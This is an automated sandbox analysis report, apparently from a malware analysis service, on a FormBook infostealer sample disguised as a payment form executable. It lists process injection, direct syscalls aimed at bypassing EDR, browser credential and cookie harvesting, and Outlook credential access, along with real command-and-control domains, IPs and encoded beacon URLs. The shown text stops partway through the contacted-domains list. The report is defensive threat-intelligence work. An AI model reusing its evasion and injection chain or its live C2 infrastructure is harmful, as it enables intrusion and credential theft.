            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05157330 mov eax, dword ptr fs:[00000030h]3_2_05157330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518F32A mov eax, dword ptr fs:[00000030h]3_2_0518F32A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E035C mov eax, dword ptr fs:[00000030h]3_2_051E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E035C mov eax, dword ptr fs:[00000030h]3_2_051E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E035C mov eax, dword ptr fs:[00000030h]3_2_051E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E035C mov ecx, dword ptr fs:[00000030h]3_2_051E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E035C mov eax, dword ptr fs:[00000030h]3_2_051E035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E035C mov eax, dword ptr fs:[00000030h]3_2_051E035C
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8257D00 RtlAddVectoredExceptionHandler,RaiseFailFastException,0_2_00007FF6E8257D00
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82B0EAC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6E82B0EAC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQueryValueKey: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtOpenKeyEx: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread register set: target process: 8104Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread APC queued: target process: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 70E008Jump to behavior
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: QYzBgoBGBcxProZWs.exe, 00000005.00000002.3787758854.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000000.1505305130.0000000001BD1000.00000002.00000001.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3787839821.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82B1554 cpuid 0_2_00007FF6E82B1554
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E82B11B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6E82B11B0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		3
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts612
            Process Injection            		1
            Access Token Manipulation            		LSASS Memory121
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		612
            Process Injection            		Security Account Manager3
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing            		DCSync114
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1475677 Sample: Payment Form+Inquiry LIST.exe Startdate: 18/07/2024 Architecture: WINDOWS Score: 100 30 www.mg55aa.xyz 2->30 32 www.valerieomage.com 2->32 34 16 other IPs or domains 2->34 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 5 other signatures 2->52 10 Payment Form+Inquiry LIST.exe 1 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 signatures5 64 Writes to foreign memory regions 10->64 66 Allocates memory in foreign processes 10->66 68 Injects a PE file into a foreign processes 10->68 13 vbc.exe 10->13         started        16 conhost.exe 10->16         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 18 QYzBgoBGBcxProZWs.exe 13->18 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 18->42 21 findstr.exe 13 18->21         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal browser information (history, passwords, etc) 21->56 58 Modifies the context of a thread in another process (thread injection) 21->58 60 3 other signatures 21->60 24 QYzBgoBGBcxProZWs.exe 21->24 injected 28 firefox.exe 21->28         started        process12 dnsIp13 36 www.lacemalt.top 203.161.55.102, 49723, 49724, 49725 VNPT-AS-VNVNPTCorpVN Malaysia 24->36 38 siteblogoficialon.com 108.179.193.98, 49727, 49728, 49729 UNIFIEDLAYER-AS-1US United States 24->38 40 7 other IPs or domains 24->40 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment Form+Inquiry LIST.exe56%VirustotalBrowse
            Payment Form+Inquiry LIST.exe58%ReversingLabsWin64.Trojan.Leonem

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            siteblogoficialon.com0%VirustotalBrowse
            www.csstoneoak.com1%VirustotalBrowse
            www.lavillitadepapa.com1%VirustotalBrowse
            www.instantmailer.cloud1%VirustotalBrowse
            mybodyradar.net11%VirustotalBrowse
            www.amkmos.online1%VirustotalBrowse
            www.kosherphonestore.com5%VirustotalBrowse
            www.valerieomage.com0%VirustotalBrowse
            www.gzlhysuess.com0%VirustotalBrowse
            www.mcxright.com1%VirustotalBrowse
            www.gospelstudygroup.org1%VirustotalBrowse
            www.siteblogoficialon.com0%VirustotalBrowse
            www.mybodyradar.net1%VirustotalBrowse
            shops.myshopify.com0%VirustotalBrowse
            www.cwgehkk.store0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.valerieomage.com/c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH00%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0100%Avira URL Cloudmalware
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/7npk/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            http://www.siteblogoficialon.com/xti2/0%Avira URL Cloudsafe
            https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl0%Avira URL Cloudsafe
            https://www.lavillitadepapa.com/i1fz/?mZytyNB=69100%Avira URL Cloudmalware
            http://www.csstoneoak.com/gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA==0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility8d80%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            http://www.lacemalt.top/tb8p/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.mybodyradar.net/nml2/100%Avira URL Cloudmalware
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/0%Avira URL Cloudsafe
            http://www.lacemalt.top/tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg==0%Avira URL Cloudsafe
            http://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH00%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
            https://www.etmt194.com/s1/yurjyyya0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
            http://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH00%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/i1fz/100%Avira URL Cloudmalware
            https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixt0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA==0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            http://www.csstoneoak.com/gtrt/0%Avira URL Cloudsafe
            https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC80%Avira URL Cloudsafe
            http://www.mg55aa.xyz/7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q==0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.lacemalt.top
            		203.161.55.102
            		truetrue
              		unknown
              www.kosherphonestore.com.cdn.hstgr.net
              		84.32.84.101
              		truetrue
                		unknown
                siteblogoficialon.com
                		108.179.193.98
                		truetrueunknown
                www.csstoneoak.com
                		154.92.52.196
                		truetrueunknown
                www.mg55aa.xyz
